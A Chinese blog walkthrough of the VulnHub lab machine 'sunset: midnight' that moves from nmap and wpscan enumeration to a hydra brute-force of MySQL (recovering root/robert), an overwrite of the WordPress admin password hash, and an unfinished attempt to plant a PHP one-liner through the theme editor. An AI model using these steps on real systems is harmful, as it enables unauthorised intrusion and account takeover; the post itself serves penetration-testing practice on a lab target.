靶机 sunset: midnight

emper   ·   发表于 2020-09-02 19:37:31   ·   技术文章

sunset: midnight 实战

前置

1. 下载靶机

前往https://www.vulnhub.com/,下载我们想要使用的靶机

本次实战使用的靶机是sunset: midnight

2. 导入VMware

我是用的是VM15,这里我们直接

点击文件-》打开-》选择我们下载完的文件(如果是压缩包的话记得解压,源文件为.ova后缀)

导入

然后自定义名称,和存放位置,等待完成即可

3. 开启虚拟机

导入完成后直接开启它即可

接下来就是我们的实战了

 

实战

攻击机:kaili2020

目标机:midnight

1. 查看简介

我们需要明白我们的目标是什么

所以我们最好看看靶机的简介(就在你下载靶机的下面一点点)

  1. Difficulty: Intermediate
  2. Important!: Before auditing this machine make sure you add the host "sunset-midnight" to your /etc/hosts file, otherwise it may not work as expected.
  3. It is recommended to run this machine in Virtualbox.
  4. This works better with ViritualBox rather than VMware

英文,看不懂?没关系,可以翻译

  1. 难度:中级
  2. 重要!:在审核本机之前,请确保将主机“ sunset-midnight”添加到/ etc / hosts文件中,否则它可能无法正常工作。
  3. 建议在Virtualbox中运行此计算机。
  4. ViritualBox相比,与VMware搭配使用更有效

这就是说要让我们将主机加入到hosts文件中,保证正常运行,然后就没了

那么我们正式开始

 

2. 获取目标机器IP

使用netdiscover可以在网络上扫描IP地址

  1. root@For-Fun:~# netdiscover

发现扫描结果

  1. Currently scanning: 10.9.247.0/8 | Screen View: Unique Hosts
  2. 879 Captured ARP Req/Rep packets, from 4 hosts. Total size: 52740
  3. _____________________________________________________________________________
  4. IP At MAC Address Count Len MAC Vendor / Hostname
  5. -----------------------------------------------------------------------------
  6. 192.168.83.1 00:50:56:c0:00:08 782 46920 VMware, Inc.
  7. 192.168.83.2 00:50:56:e6:01:14 42 2520 VMware, Inc.
  8. 192.168.83.128 00:0c:29:fb:32:82 45 2700 VMware, Inc.
  9. 192.168.83.254 00:50:56:e7:95:b1 10 600 VMware, Inc.

发现没有出现目标机器

这时候我们就需要看看目标机器的网络设置

发现设置的是桥接模式,不在同一网络中

网络连接

那么我们设置为net模式

然后接着扫描

发现还是无法扫描

那么我们去看看目标机器是否获取了IP

 

查看目标机器是否获取了IP

1.开机界面面按下e键

进入操作界面

2. 替换
  1. ro 替换为 rw signie init=/bin/bash

替换

然后 按下Ctrl键+X键,进入命令行

root

 

3. 查看当前网卡IP
  1. ip a

ip

发现没有获取到IP

 

4. 编辑网卡配置文件
  1. vi /etc/network/interfaces

查看

发现网卡与我们查看IP的时候不一致,那么需要进行更改(记得全改)

  1. vim编辑命令
  2. 插入文本 i
  3. 在末尾添加文本 a
  4. 光标运动 h,j , k, l (上/下/左/右)
  5. 删除字符 x
  6. 删除行 dd
  7. 模式退出 Esc,Insert(或者i
  8. 退出编辑器 q
  9. 强制退出不保存 q!
  10. 运行shell命令 :sh(使用exit返回vi编辑器)
  11. 保存文件 :w
  12. 保存文件并退出 :wq
  13. 文本查找 /

更改

 

5. 重启网卡服务
  1. /etc/init.d/networking restart

重启

成功获取到IP地址!!!

查看一下

  1. ip a

IP

ok,获取成功(192.168.83.145)

重启该机器

然后接着去扫描看看

 

扫描IP

  1. root@For-Fun:~# netdiscover
  2. Currently scanning: 192.168.208.0/16 | Screen View: Unique Hosts
  3. z
  4. 17 Captured ARP Req/Rep packets, from 4 hosts. Total size: 1020 At MAC Address Count Len MAC Vend
  5. _____________________________________________________________________________:50:56:c0:00:08 8 480 VMware,
  6. IP At MAC Address Count Len MAC Vendor / Hostname :0c:29:07:a4:e4 1 60 VMware,
  7. -----------------------------------------------------------------------------
  8. 192.168.83.1 00:50:56:c0:00:08 14 840 VMware,
  9. 192.168.83.2 00:50:56:e6:01:14 1 60 VMware,
  10. 192.168.83.145 00:0c:29:07:a4:e4 1 60 VMware,
  11. 192.168.83.254 00:50:56:e4:b0:56 1 60 VMware,

发现扫描到了我们的目标机器,那么开始操作了

 

3. namp端口扫描

3.1 扫描(-A)一把梭哈

  1. root@For-Fun:~# nmap -A 192.168.83.145
  2. Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-15 22:59 CST
  3. Nmap scan report for 192.168.83.145
  4. Host is up (0.00044s latency).
  5. Not shown: 997 closed ports
  6. PORT STATE SERVICE VERSION
  7. 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
  8. | ssh-hostkey:
  9. | 2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
  10. | 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
  11. |_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
  12. 80/tcp open http Apache httpd 2.4.38 ((Debian))
  13. | http-robots.txt: 1 disallowed entry
  14. |_/wp-admin/
  15. |_http-server-header: Apache/2.4.38 (Debian)
  16. |_http-title: Did not follow redirect to http://sunset-midnight/
  17. |_https-redirect: ERROR: Script execution failed (use -d to debug)
  18. 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
  19. | mysql-info:
  20. | Protocol: 10
  21. | Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
  22. | Thread ID: 14
  23. | Capabilities flags: 63486
  24. | Some Capabilities: Support41Auth, InteractiveClient, SupportsCompression, FoundRows, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, Speaks41ProtocolNew, ConnectWithDatabase, SupportsLoadDataLocal, LongColumnFlag, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
  25. | Status: Autocommit
  26. | Salt: M5_aI(,ETW9V&Wdr07``
  27. |_ Auth Plugin Name: mysql_native_password
  28. MAC Address: 00:0C:29:07:A4:E4 (VMware)
  29. No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
  30. TCP/IP fingerprint:
  31. OS:SCAN(V=7.80%E=4%D=8/15%OT=22%CT=1%CU=40001%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
  32. OS:M=5F37F87D%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
  33. OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
  34. OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
  35. OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
  36. OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
  37. OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
  38. OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
  39. OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
  40. OS:%T=40%CD=S)
  41. Network Distance: 1 hop
  42. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  43. TRACEROUTE
  44. HOP RTT ADDRESS
  45. 1 0.44 ms 192.168.83.145
  46. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  47. Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds

 

3.2 分析

我们看扫描的结果,发现了目标开放了80端口和3306端口

  1. 80/tcp open http Apache httpd 2.4.38 ((Debian))
  2. | http-robots.txt: 1 disallowed entry
  3. |_/wp-admin/
  4. |_http-server-header: Apache/2.4.38 (Debian)
  5. |_http-title: Did not follow redirect to http://sunset-midnight/
  6. |_https-redirect: ERROR: Script execution failed (use -d to debug)
  7. 3306/tcp open mysql MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
  8. | mysql-info:
  9. | Protocol: 10
  10. | Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
  11. | Thread ID: 14
  12. | Capabilities flags: 63486
  13. | Some Capabilities: Support41Auth, InteractiveClient, SupportsCompression, FoundRows,

那么我们可以访问80端口

 

4. 浏览器访问目标主机

  1. 192.168.83.145

结果发现无法访问

失败

然后我们想到了前面的提示

  1. make sure you add the host "sunset-midnight" to your /etc/hosts file, otherwise it may not work as expected.

看来这里已经提示了我们要先将主机写入host文件里面啊

4.1 编辑hosts文件

  1. root@For-Fun:~# vim /etc/hosts
  2. ....
  3. 127.0.0.1 localhost

那么我们就将其加入进去即可

  1. 127.0.0.1 localhost
  2. 192.168.83.145 sunset-midnight

然后esc,:wq保存并退出

然后再次尝试访问

4.2 访问目标80端口

  1. 192.168.83.145

访问成功

浏览发现

  1. Proudly powered by WordPress

 

5. WPscan扫描

使用wordpress扫描工具-wpscan来扫描一下

5.1 wpscan指令

如果第一次使用,不知道指令的,可以查看帮助,来了解有哪些指令

  1. root@For-Fun:~# wpscan --help
  2. _______________________________________________________________
  3. __ _______ _____
  4. \ \ / / __ \ / ____|
  5. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  6. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  7. \ /\ / | | ____) | (__| (_| | | | |
  8. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  9. WordPress Security Scanner by the WPScan Team
  10. Version 3.8.4
  11. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  12. _______________________________________________________________
  13. Usage: wpscan [options]
  14. --url URL The URL of the blog to scan
  15. Allowed Protocols: http, https
  16. Default Protocol if none provided: http
  17. This option is mandatory unless update or help or hh or version is/are supplied
  18. -h, --help Display the simple help and exit
  19. --hh Display the full help and exit
  20. --version Display the version and exit
  21. -v, --verbose Verbose mode
  22. --[no-]banner Whether or not to display the banner
  23. Default: true
  24. -o, --output FILE Output to FILE
  25. -f, --format FORMAT Output results in the format supplied
  26. Available choices: cli-no-colour, cli-no-color, json, cli
  27. --detection-mode MODE Default: mixed
  28. Available choices: mixed, passive, aggressive
  29. --user-agent, --ua VALUE
  30. --random-user-agent, --rua Use a random user-agent for each scan
  31. --http-auth login:password
  32. -t, --max-threads VALUE The max threads to use
  33. Default: 5
  34. --throttle MilliSeconds Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.
  35. --request-timeout SECONDS The request timeout in seconds
  36. Default: 60
  37. --connect-timeout SECONDS The connection timeout in seconds
  38. Default: 30
  39. --disable-tls-checks Disables SSL/TLS certificate verification, and downgrade to TLS1.0+ (requires cURL 7.66 for the latter)
  40. --proxy protocol://IP:port Supported protocols depend on the cURL installed
  41. --proxy-auth login:password
  42. --cookie-string COOKIE Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]
  43. --cookie-jar FILE-PATH File to read and write cookies
  44. Default: /tmp/wpscan/cookie_jar.txt
  45. --force Do not check if the target is running WordPress
  46. --[no-]update Whether or not to update the Database
  47. --api-token TOKEN The WPVulnDB API Token to display vulnerability data
  48. --wp-content-dir DIR The wp-content directory if custom or not detected, such as "wp-content"
  49. --wp-plugins-dir DIR The plugins directory if custom or not detected, such as "wp-content/plugins"
  50. -e, --enumerate [OPTS] Enumeration Process
  51. Available Choices:
  52. vp Vulnerable plugins
  53. ap All plugins
  54. p Popular plugins
  55. vt Vulnerable themes
  56. at All themes
  57. t Popular themes
  58. tt Timthumbs
  59. cb Config backups
  60. dbe Db exports
  61. u User IDs range. e.g: u1-5
  62. Range separator to use: '-'
  63. Value if no argument supplied: 1-10
  64. m Media IDs range. e.g m1-15
  65. Note: Permalink setting must be set to "Plain" for those to be detected
  66. Range separator to use: '-'
  67. Value if no argument supplied: 1-100
  68. Separator to use between the values: ','
  69. Default: All Plugins, Config Backups
  70. Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
  71. Incompatible choices (only one of each group/s can be used):
  72. - vp, ap, p
  73. - vt, at, t
  74. --exclude-content-based REGEXP_OR_STRING Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration.
  75. Both the headers and body are checked. Regexp delimiters are not required.
  76. --plugins-detection MODE Use the supplied mode to enumerate Plugins.
  77. Default: passive
  78. Available choices: mixed, passive, aggressive
  79. --plugins-version-detection MODE Use the supplied mode to check plugins' versions.
  80. Default: mixed
  81. Available choices: mixed, passive, aggressive
  82. -P, --passwords FILE-PATH List of passwords to use during the password attack.
  83. If no --username/s option supplied, user enumeration will be run.
  84. -U, --usernames LIST List of usernames to use during the password attack.
  85. Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'
  86. --multicall-max-passwords MAX_PWD Maximum number of passwords to send by request with XMLRPC multicall
  87. Default: 500
  88. --password-attack ATTACK Force the supplied attack to be used rather than automatically determining one.
  89. Available choices: wp-login, xmlrpc, xmlrpc-multicall
  90. --stealthy Alias for --random-user-agent --detection-mode passive --plugins-version-detection passive
  91. [!] To see full list of options use --hh.

最简单的就是直接去扫描

 

5.2 wpscan扫描目标网站

直接扫描的指令

  1. root@For-Fun:~# wpscan --url url

填上目标的url就可以开始扫描

扫描目标主机

  1. root@For-Fun:~# wpscan --url http://sunset-midnight/
  2. _______________________________________________________________
  3. __ _______ _____
  4. \ \ / / __ \ / ____|
  5. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  6. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  7. \ /\ / | | ____) | (__| (_| | | | |
  8. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  9. WordPress Security Scanner by the WPScan Team
  10. Version 3.8.4
  11. Sponsored by Automattic - https://automattic.com/
  12. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  13. _______________________________________________________________
  14. [+] URL: http://sunset-midnight/ [192.168.83.145]
  15. [+] Started: Sun Aug 16 13:42:58 2020
  16. Interesting Finding(s):
  17. [+] Headers
  18. | Interesting Entry: Server: Apache/2.4.38 (Debian)
  19. | Found By: Headers (Passive Detection)
  20. | Confidence: 100%
  21. [+] http://sunset-midnight/robots.txt
  22. | Interesting Entries:
  23. | - /wp-admin/
  24. | - /wp-admin/admin-ajax.php
  25. | Found By: Robots Txt (Aggressive Detection)
  26. | Confidence: 100%
  27. [+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
  28. | Found By: Direct Access (Aggressive Detection)
  29. | Confidence: 100%
  30. | References:
  31. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  32. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  33. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  34. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  35. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  36. [+] http://sunset-midnight/readme.html
  37. | Found By: Direct Access (Aggressive Detection)
  38. | Confidence: 100%
  39. [+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
  40. | Found By: Direct Access (Aggressive Detection)
  41. | Confidence: 100%
  42. [+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
  43. | Found By: Direct Access (Aggressive Detection)
  44. | Confidence: 60%
  45. | References:
  46. | - https://www.iplocation.net/defend-wordpress-from-ddos
  47. | - https://github.com/wpscanteam/wpscan/issues/1299
  48. [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
  49. | Found By: Rss Generator (Passive Detection)
  50. | - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
  51. | - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
  52. [+] WordPress theme in use: twentyseventeen
  53. | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
  54. | Last Updated: 2020-08-11T00:00:00.000Z
  55. | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
  56. | [!] The version is out of date, the latest version is 2.4
  57. | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
  58. | Style Name: Twenty Seventeen
  59. | Style URI: https://wordpress.org/themes/twentyseventeen/
  60. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
  61. | Author: the WordPress team
  62. | Author URI: https://wordpress.org/
  63. |
  64. | Found By: Css Style In Homepage (Passive Detection)
  65. | Confirmed By: Css Style In 404 Page (Passive Detection)
  66. |
  67. | Version: 2.3 (80% confidence)
  68. | Found By: Style (Passive Detection)
  69. | - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
  70. [+] Enumerating All Plugins (via Passive Methods)
  71. [+] Checking Plugin Versions (via Passive and Aggressive Methods)
  72. [i] Plugin(s) Identified:
  73. [+] simply-poll-master
  74. | Location: http://sunset-midnight/wp-content/plugins/simply-poll-master/
  75. |
  76. | Found By: Urls In Homepage (Passive Detection)
  77. | Confirmed By: Urls In 404 Page (Passive Detection)
  78. |
  79. | Version: 1.5 (100% confidence)
  80. | Found By: Readme - Stable Tag (Aggressive Detection)
  81. | - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
  82. | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
  83. | - http://sunset-midnight/wp-content/plugins/simply-poll-master/readme.txt
  84. [+] Enumerating Config Backups (via Passive and Aggressive Methods)
  85. Checking Config Backups - Time: 00:00:00 <==================================================================> (21 / 21) 100.00% Time: 00:00:00
  86. [i] No Config Backups Found.
  87. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  88. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
  89. [+] Finished: Sun Aug 16 13:43:03 2020
  90. [+] Requests Done: 23
  91. [+] Cached Requests: 36
  92. [+] Data Sent: 5.319 KB
  93. [+] Data Received: 63.057 KB
  94. [+] Memory used: 212.102 MB
  95. [+] Elapsed time: 00:00:04

 

5.3 信息整理

  1. 存在robots.txt文件,发现admin页面
  1. [+] http://sunset-midnight/robots.txt
  2. | Interesting Entries:
  3. | - /wp-admin/
  4. | - /wp-admin/admin-ajax.php
  5. | Found By: Robots Txt (Aggressive Detection)
  6. | Confidence: 100%
  1. 存在文件上传
  1. [+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
  2. | Found By: Direct Access (Aggressive Detection)
  3. | Confidence: 100%

先分析到这,去尝试

 

5.4 访问

分别访问,发现只有管理员登录界面有点用

登录

那么我们可以尝试爆破用户,密码

1. 爆破用户

接着使用wpscan,来爆破用户

  1. root@For-Fun:~# wpscan --url http://sunset-midnight/ -e u
  2. _______________________________________________________________
  3. __ _______ _____
  4. \ \ / / __ \ / ____|
  5. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  6. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  7. \ /\ / | | ____) | (__| (_| | | | |
  8. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  9. WordPress Security Scanner by the WPScan Team
  10. Version 3.8.4
  11. Sponsored by Automattic - https://automattic.com/
  12. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  13. _______________________________________________________________
  14. [+] URL: http://sunset-midnight/ [192.168.83.145]
  15. [+] Started: Sun Aug 16 17:15:56 2020
  16. Interesting Finding(s):
  17. [+] Headers
  18. | Interesting Entry: Server: Apache/2.4.38 (Debian)
  19. | Found By: Headers (Passive Detection)
  20. | Confidence: 100%
  21. [+] http://sunset-midnight/robots.txt
  22. | Interesting Entries:
  23. | - /wp-admin/
  24. | - /wp-admin/admin-ajax.php
  25. | Found By: Robots Txt (Aggressive Detection)
  26. | Confidence: 100%
  27. [+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
  28. | Found By: Direct Access (Aggressive Detection)
  29. | Confidence: 100%
  30. | References:
  31. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  32. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  33. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  34. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  35. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  36. [+] http://sunset-midnight/readme.html
  37. | Found By: Direct Access (Aggressive Detection)
  38. | Confidence: 100%
  39. [+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
  40. | Found By: Direct Access (Aggressive Detection)
  41. | Confidence: 100%
  42. [+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
  43. | Found By: Direct Access (Aggressive Detection)
  44. | Confidence: 60%
  45. | References:
  46. | - https://www.iplocation.net/defend-wordpress-from-ddos
  47. | - https://github.com/wpscanteam/wpscan/issues/1299
  48. [+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
  49. | Found By: Rss Generator (Passive Detection)
  50. | - http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
  51. | - http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
  52. [+] WordPress theme in use: twentyseventeen
  53. | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
  54. | Last Updated: 2020-08-11T00:00:00.000Z
  55. | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
  56. | [!] The version is out of date, the latest version is 2.4
  57. | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
  58. | Style Name: Twenty Seventeen
  59. | Style URI: https://wordpress.org/themes/twentyseventeen/
  60. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
  61. | Author: the WordPress team
  62. | Author URI: https://wordpress.org/
  63. |
  64. | Found By: Css Style In Homepage (Passive Detection)
  65. | Confirmed By: Css Style In 404 Page (Passive Detection)
  66. |
  67. | Version: 2.3 (80% confidence)
  68. | Found By: Style (Passive Detection)
  69. | - http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
  70. [+] Enumerating Users (via Passive and Aggressive Methods)
  71. Brute Forcing Author IDs - Time: 00:00:00 <=================================================================> (10 / 10) 100.00% Time: 00:00:00
  72. [i] User(s) Identified:
  73. [+] admin
  74. | Found By: Author Posts - Author Pattern (Passive Detection)
  75. | Confirmed By:
  76. | Rss Generator (Passive Detection)
  77. | Wp Json Api (Aggressive Detection)
  78. | - http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1
  79. | Oembed API - Author URL (Aggressive Detection)
  80. | - http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json
  81. | Rss Generator (Aggressive Detection)
  82. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  83. | Login Error Messages (Aggressive Detection)
  84. [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
  85. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
  86. [+] Finished: Sun Aug 16 17:16:42 2020
  87. [+] Requests Done: 48
  88. [+] Cached Requests: 9
  89. [+] Data Sent: 11.854 KB
  90. [+] Data Received: 596.468 KB
  91. [+] Memory used: 177.289 MB
  92. [+] Elapsed time: 00:00:46

发现爆破到了admin用户

  1. [+] admin
  2. | Found By: Author Posts - Author Pattern (Passive Detection)
  3. | Confirmed By:
  4. | Rss Generator (Passive Detection)
  5. | Wp Json Api (Aggressive Detection)
  6. | - http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1
  7. | Oembed API - Author URL (Aggressive Detection)
  8. | - http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json
  9. | Rss Generator (Aggressive Detection)
  10. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  11. | Login Error Messages (Aggressive Detection)

那么我们可以尝试爆破密码

 

2. 爆破密码

这里我们需要字典,那么我们就使用它自带的字典好了

  1. root@For-Fun:~# wpscan --url http://sunset-midnight/ -P /usr/share/wordlists/rockyou.txt -U admin
  1. -P 爆破密码
  2. /usr/share/wordlists/rockyou.txt 字典位置
  3. -U 指定用户
  4. admin 用户名

那么我们就放着慢慢跑吧

我们去分析其他的

 

5.5 3306-mysql端口

之前我们还发现开放了3306端口

这是mysql数据库的端口

那么我们可以尝试去爆破mysql的用户名密码

一般使用的是root

那么我们尝试直接爆破它的密码看看

1. haydra爆破密码

密码还是需要使用字典,那么我们就接着使用之前的字典吧

  • -l 指定用户(root)
  • -P 指定密码
  1. root@For-Fun:~# hydra 192.168.83.145 mysql -l root -P /usr/share/wordlists/rockyou.txt

爆破

发现爆破出账号密码

  1. [3306][mysql] host: 192.168.83.145 login: root password: robert

既然我们都知道了账号密码,那么我们可以尝试登录数据库

 

2. 数据库登录

这时,我们使用mysql的远程连接-h指定目标

  • 目标:192.168.83.145

  • 用户:root

  • 秘密:robert
  1. root@For-Fun:~# mysql -h 192.168.83.145 -u root -p
  2. Enter password:
  3. Welcome to the MariaDB monitor. Commands end with ; or \g.
  4. Your MariaDB connection id is 954022
  5. Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10
  6. Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
  7. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  8. MariaDB [(none)]>
3. 查看数据

先查看下有哪些数据库

  1. MariaDB [(none)]> show databases;
  2. +--------------------+
  3. | Database |
  4. +--------------------+
  5. | information_schema |
  6. | mysql |
  7. | performance_schema |
  8. | wordpress_db |
  9. +--------------------+
  10. 4 rows in set (0.072 sec)

咦,发现了wordpress_db,可能就是我们要找的数据库

进入看看,然后看看表

  1. MariaDB [(none)]> use wordpress_db
  2. Reading table information for completion of table and column names
  3. You can turn off this feature to get a quicker startup with -A
  4. Database changed
  5. MariaDB [wordpress_db]> show tables;
  6. +------------------------+
  7. | Tables_in_wordpress_db |
  8. +------------------------+
  9. | wp_commentmeta |
  10. | wp_comments |
  11. | wp_links |
  12. | wp_options |
  13. | wp_postmeta |
  14. | wp_posts |
  15. | wp_sp_polls |
  16. | wp_term_relationships |
  17. | wp_term_taxonomy |
  18. | wp_termmeta |
  19. | wp_terms |
  20. | wp_usermeta |
  21. | wp_users |
  22. +------------------------+
  23. 13 rows in set (0.001 sec)

发现了:wp_users,里面应该存放的是用户数据

进行查看

  1. MariaDB [wordpress_db]> select * from wp_users;

数据

查询到

  1. 用户:admin
  2. 密码:$P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/

不过看这样子,密码被加密了

那么接下来我们怎么办?

有多种方法:

  1. 尝试解密
    1. 网上搜索解密网站解密(一般数据库加密方式为hash,md5)
    2. 使用工具破解-jhon
  2. 直接覆盖数据,将其变成我们创建的数据

 

这里我们直接覆盖好了,简单粗暴(这一般是hacker的操作)

 

4. 更新数据

首先去获取一个加密后的mad5数据(随便找一个加密网站,或者直接调用函数可以直接得到)

  1. 123456 --> E10ADC3949BA59ABBE56E057F20F883E

然后我们去更新数据

  • update:更新操作
  • wp_users:我们要更新的表
  • set:要更新的地方
  1. MariaDB [wordpress_db]> update wp_users set user_pass='E10ADC3949BA59ABBE56E057F20F883E' where user_login='admin';
  2. Query OK, 1 row affected (0.002 sec)
  3. Rows matched: 1 Changed: 1 Warnings: 0

然后我们再次查看数据

  1. MariaDB [wordpress_db]> select * from wp_users;

数据

发现更新了

  1. user_loginadmin
  2. user_passE10ADC3949BA59ABBE56E057F20F883E

那么我们尝试登录看看

登录

发现登录的密码错误,怎么回事?

没有加密错啊?

结果发现:使用MD5加密时,要加密的字符串中字母需要区分大小写

我们之前使用的是大写加密,那么我们尝试小写看看

 

5. 再次更改数据

加密

  1. 123456 --> e10adc3949ba59abbe56e057f20f883e

更新数据

  1. MariaDB [wordpress_db]> update wp_users set user_pass='e10adc3949ba59abbe56e057f20f883e' where user_login='admin';
  2. Query OK, 1 row affected (0.001 sec)
  3. Rows matched: 1 Changed: 1 Warnings: 0

更新完成

查看一下

  1. MariaDB [wordpress_db]> select * from wp_users;

数据

发现

  1. user_loginadmin
  2. user_pass$P$B7xTzj.plSvhoLVSdmMFD85IJZSdWq1

加密的数据是不是转换成类似我们之前看到的了?那么可能就成功了(到现在前面爆破还没跑出来

再次登录

  1. 用户:admin
  2. 密码:123456

登录成功

OK!!!

登录成功!!!

那么我们继续

 

6. getshell

一般getshell的方法:

  1. 上传木马
    1. 一句话木马
    2. 图片马
    3. ……….等
  2. 修改数据使其变成木马
  3. ………等

当我们没有头绪的时候,可以上网搜搜,看看是否会有灵感

发现我们可以:

  1. 上传一句话木马
  2. 上传图片马
  3. 上传文件
  4. 直接编辑主题
  5. ………等

那么我们就使用编辑的方法吧

1. 主题编辑-(失败)

1.1 写马

Appearance->Theme Editor

随便挑选一个地方写入一句话木马

  1. <?php eval(phpinfo());?>

编辑

写入后保存

但是这文件路径在哪呢???

这时候我们之前的扫描就起了效果

  1. [+] WordPress theme in use: twentyseventeen
  2. | Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
  3. | Last Updated: 2020-08-11T00:00:00.000Z
  4. | Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
  5. | [!] The version is out of date, the latest version is 2.4
  6. | Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
  7. | Style Name: Twenty Seventeen
  8. | Style URI: https://wordpress.org/themes/twentyseventeen/
  9. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
  10. | Author: the WordPress team
  11. | Author URI: https://wordpress.org/
  12. |
  13. | Found By: Css Style In Homepage (Passive Detection)
